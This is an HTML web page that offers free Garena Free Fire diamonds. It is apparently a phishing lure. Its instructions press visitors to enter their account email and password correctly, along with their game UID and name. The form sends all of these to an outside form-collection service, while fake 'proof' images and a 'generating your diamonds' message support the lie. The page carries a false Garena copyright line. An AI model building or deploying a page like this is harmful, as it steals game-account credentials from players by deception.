<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free Fire Diamonds</title>
    <link rel="icon" href="5.jpg">
    <link rel="stylesheet" href="style.css">
    <style>
    body{
        margin: 0 auto;
        width: 90%;
        max-width: 1000px;
        padding:10px;
    }
    #pic{
        padding:20px;
    }
    #box{
        float:right;
        width: 550px;
        margin-right: 30px;
        height: 310px;
        border-radius: 5px;
        padding: 1em;
        background-color: aqua;
    }    
    p{
        font-family:Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;
        font-size: 30px;
        padding: 12px;
        margin-left: 1px;
        color:rgba(246, 117, 207, 0.897)
        
    }    
    h1{
        background-color:Black;
        color:White;
        text-align: center;
        padding: 12px;
        text-decoration-style: none;
        margin-top: 2%;
        margin-bottom: 2%;
        font-size: larger;
        font-family:B612;
        font-size: 60px;
        background-attachment: fixed;
    }
    .steps{
        font-family:-apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        font-size:50px;
        padding: 12px;
        margin-left: 20px;
        color: rgb(80, 245, 237);
        
    }
    body{
        background-color: #000000;
    }

    .follow{
        font-size: 30px;
        font-family: arial;
        background-color: light rgba(114, 212, 236, 0.157);
        color:white;
        
    }
    h2{
        color: aqua;
        background-color:black;
        padding: 22px;
        text-align: center;
        font-size:30px;
        width: 100%;
    }
    .form{
        padding:12px;
        color: rgb(72, 238, 230);
        
    }
    .sen{
        color: rgba(29, 197, 43, 0.897);
        font-size:25px;
    }
    .Leg{
        color:rgb(47, 224, 71);
        font-size: 25px;
        font-weight: bolder;
    }
    input[type="submit"]{
        cursor: pointer;
        border-radius: 12px;
        padding: 12px 20px;
        background-color: rgb(255, 38, 38);
        width: 930px;
    }
        input[type="submit"]:hover{
        background-color: greenyellow;
        font-size: 30px;
    }
    .container{
        background: color #f2f2f2;;
        padding:5px 20px 15px 20px;
        border: 1px solid lightgray;
        border-radius: 4px;
    }
    input[type="text"],
    input[type="password"],
    input[type="number"],
    input[type="text"],
    select,
    textarea{
        width:100%;
        padding:8px;
    }
    .com{
        color:aqua;
        font-size: 50px;
        text-align: center;
        margin-bottom:0%;
    }
    h6{
        background-color: black;
        font-size:15px;
        color:white;

    }
    </style>
</head>
<body>
    <h1>Free Fire Diamonds</h1>
    <img id="box" src="Main background wallpaper.png" alt="Plz Chack Your Internet Connection">
    <p>This is the world best website for getting Free Diamonds in Garena Free Fire <br>
        We will try to make your experience good.<br>
        We will be updating this website according to your views.<br>
    </p>
    <p class="steps">Steps To Be Followed:</p>
    <p class="follow">
        1.First enter your email-id and Password correctly.<br>
        2.Second you need to ensure that the password and email id are correctly filled,because if there will be any issue than you can not get free diamonds.<br>
        3.Third you need to enter your Game UID properly.<br>
        4.Enter your game name (ex-"Raistar","ajjubhai94","Amitbhai" etc).<br>
        5.Click on Submit Button for getting diamonds.<br>
        6.Now wait for 5-10 minutes.You will get diamonds.<br>
    </p>
    <h2>Images For Proof</h2>
    <img id="pic" src="1.jpg" alt="" width="34%">
    <img id="pic" src="2.jpg" alt="" width="20%">
    <img  id="pic"src="7.jpg" alt="" width="30%">
    
    <div class="container">    
    <form action="https://formspree.io/f/moqykvky" method="POST">
    <h1>Register for Free Diamonds</h1>
    <p class="form">Email-id: <input type="text" name="email-id" required placeholder="Email-id"></p>
    <p class="form">Password: <input type="password" name="password" required placeholder="Password"></p>
    <p class="form">UID: <input type="number" name="uid" required placeholder=" Game UID"></p>
    <p class="form">Name: <input type="text" name="name" required placeholder="Game Name"></p>
    <legend class="Leg">Gender </legend>
    <p class="form">Male: <input type="radio" name="Gender" required> Female: <input type="radio" name="Gender" required></p>
    <p class="form">Amount Of Diamonds : <input type="number" name="amt" required placeholder="Enter in numbers only"></p>
    <h3 class="sen">Plz Wait till we are generating your diamonds.....</h3>
    <p class="sub"><input type="submit" value="Submit"></p>
    </form>
    </div>
    <h3 class="com">COMMENTS</h3>
    <p><textarea name="comments" cols="30" rows="10"></textarea></p>
    <h6>Copyright@GareanInternational<br>
        Trademark belong to their actual owner.All rights reserved.
    </h6>


</body>
</html>